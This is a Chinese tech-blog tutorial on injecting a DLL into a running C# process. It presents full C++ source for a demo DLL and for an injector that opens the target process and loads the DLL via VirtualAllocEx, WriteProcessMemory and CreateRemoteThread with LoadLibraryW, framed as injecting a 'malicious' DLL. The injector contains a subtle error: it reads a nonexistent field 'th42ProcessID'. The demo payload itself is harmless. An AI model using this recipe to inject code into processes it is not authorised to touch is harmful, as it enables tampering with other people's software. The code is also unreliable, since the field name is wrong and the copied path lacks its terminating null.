溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

在C#程序中怎么注入惡意DLL

發(fā)布時(shí)間:2022-09-05 09:51:20 來(lái)源:億速云 閱讀:133 作者:iii 欄目:開(kāi)發(fā)技術(shù)

今天小編給大家分享一下在C#程序中怎么注入惡意DLL的相關(guān)知識(shí)點(diǎn),內(nèi)容詳細(xì),邏輯清晰,相信大部分人都還太了解這方面的知識(shí),所以分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后有所收獲,下面我們一起來(lái)了解一下吧。

    實(shí)現(xiàn)原理

    1. 基本思路

    WinDbg 在附加進(jìn)程的時(shí)候,會(huì)注入一個(gè)線程到 C# 進(jìn)程 中,注入成功后,會(huì)執(zhí)行一個(gè) DbgBreakPoint() 函數(shù),其實(shí)就是 int 3 ,這時(shí)候 CPU 就會(huì)執(zhí)行 3 號(hào)中斷函數(shù),將當(dāng)前進(jìn)程的所有線程進(jìn)行暫停,文字不好理解的話,畫一個(gè)圖大概就是這樣。

    在C#程序中怎么注入惡意DLL

    口說(shuō)無(wú)憑,接下來(lái)用上一個(gè)簡(jiǎn)單案例演示一下。

    2. 案例演示

    首先寫一個(gè)簡(jiǎn)單的 C# 程序,不斷的輸出時(shí)間和標(biāo)號(hào),代碼如下:

        internal class Program
        {
            static void Main(string[] args)
            {
                for (int i = 0; i < 10000; i++)
                {
                    Console.WriteLine($"{DateTime.Now},i={i}");
                    Thread.Sleep(1000);
                }
            }
        }

    把程序跑起來(lái)后,使用 WinDbg 附加,你可以發(fā)現(xiàn) Command 自動(dòng)切換到了 8 號(hào)線程,通過(guò) k 命令可以看到最上面是一個(gè) int 3 中斷,截圖如下:

    在C#程序中怎么注入惡意DLL

    這里就有一個(gè)想法了,既然 WinDbg 可以注入,為何我的程序就注入不得呢?既然我的程序可以注入,那就可以做一些我想做的事情。

    3. 自定義注入

    有了自定義注入的想法,接下來(lái)的實(shí)現(xiàn)步驟大概是這樣的。

    • 注入一個(gè)線程到 C# 程序中。

    • 讓程序加載一個(gè) dll 文件。

    • 在 dll 中做一些我想做的業(yè)務(wù)邏輯。

    接下來(lái)新建一個(gè) C++ 的動(dòng)態(tài)鏈接庫(kù),在 DLLMain 入口函數(shù)的  DLL_PROCESS_ATTACH 事件中寫一個(gè) printf 函數(shù),如果在 C# 程序中輸出來(lái)了,就算成功注入了,參考代碼如下:

    #include <Windows.h>
    #include <stdio.h>
    
    BOOL APIENTRY DllMain(HMODULE hModule,
     DWORD  ul_reason_for_call,
     LPVOID lpReserved
    )
    {
     switch (ul_reason_for_call)
     {
     case DLL_PROCESS_ATTACH:
      printf(" 總部,總部,我已經(jīng)成功打入內(nèi)部!ul_reason_for_call=%d\n ", ul_reason_for_call);
      break;
     }
     return TRUE;
    }

    要被加載的 MyInject.dll 已經(jīng)構(gòu)建完畢,接下來(lái)就用 Win32 API 的 CreateRemoteThread() 實(shí)現(xiàn)遠(yuǎn)程注入,但注入之前需要做三件事情。

    • 獲取 C# 程序的 進(jìn)程句柄。

    • 在 C# 進(jìn)程中申請(qǐng)一塊內(nèi)存空間,存放加載的 path 路徑。

    • 調(diào)用 LoadLibraryW 函數(shù)在 C# 進(jìn)程中實(shí)現(xiàn) dll 加載。

    過(guò)程有了,新建一個(gè) C++ 控制臺(tái)程序 ConsoleApplication1.exe, 整體的參考代碼如下:

    #include <iostream>
    #include <Windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <Tlhelp32.h>
    
    DWORD GetPid(const WCHAR* szName)
    {
     HANDLE hprocessSnap = NULL;
    
     PROCESSENTRY32 pe32 = { 0 };
    
     hprocessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    
     pe32.dwSize = sizeof(PROCESSENTRY32);
    
     if (Process32First(hprocessSnap, &pe32))
     {
      do {
       if (!wcscmp(szName, pe32.szExeFile)) {
        return (int)pe32.th42ProcessID;
       }
      } while (Process32Next(hprocessSnap, &pe32));
     }
     else
     {
      CloseHandle(hprocessSnap);
     }
     return 0;
    }
    
    int main()
    {
     const wchar_t* path = L"D:\\net6\\ConsoleApp1\\x64\\Debug\\MyInject.dll"; //要注入的dll文件地址
    
     //1. 獲取進(jìn)程ID
     DWORD  procID = GetPid(L"ConsoleApp4.exe");
    
     //2. 獲取進(jìn)程句柄
     HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procID);
    
     //3. 在目標(biāo)進(jìn)程中開(kāi)辟一塊空間
     LPVOID pRemoteAdress = VirtualAllocEx(hProcess, NULL, wcslen(path) * 2, MEM_COMMIT, PAGE_READWRITE);
    
     //4. 將 path 寫入到這塊空間中
     BOOL bRet = WriteProcessMemory(hProcess, pRemoteAdress, path, wcslen(path) * 2, NULL);
    
     //5. 讓目標(biāo)線程調(diào)用 LoadLibraryW 加載我們注入的 dll
     HMODULE hModule = GetModuleHandle(L"kernel32.dll");
     LPTHREAD_START_ROUTINE dwLoadAddr = (LPTHREAD_START_ROUTINE)GetProcAddress(hModule, "LoadLibraryW");
     HANDLE hThread = CreateRemoteThread(
      hProcess,
      NULL,
      0,
      (LPTHREAD_START_ROUTINE)dwLoadAddr,
      pRemoteAdress,
      NULL,
      NULL
     );
    
     //6. 函數(shù)執(zhí)行完后,釋放這塊空間。
     WaitForSingleObject(hThread, -1);
     VirtualFreeEx(hProcess, pRemoteAdress, 1, MEM_DECOMMIT);
    
     system("pause");
     return 0;
    }

    萬(wàn)事具備,接下來(lái)我們將 ConsoleApplication1.exe 啟動(dòng),可以成功觀察到 ConsoleApp4.exe 上已經(jīng)注入成功的輸出,截圖如下:

    在C#程序中怎么注入惡意DLL

    以上就是“在C#程序中怎么注入惡意DLL”這篇文章的所有內(nèi)容,感謝各位的閱讀!相信大家閱讀完這篇文章都有很大的收獲,小編每天都會(huì)為大家更新不同的知識(shí),如果還想學(xué)習(xí)更多的知識(shí),請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

    向AI問(wèn)一下細(xì)節(jié)

    免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

    dll
    AI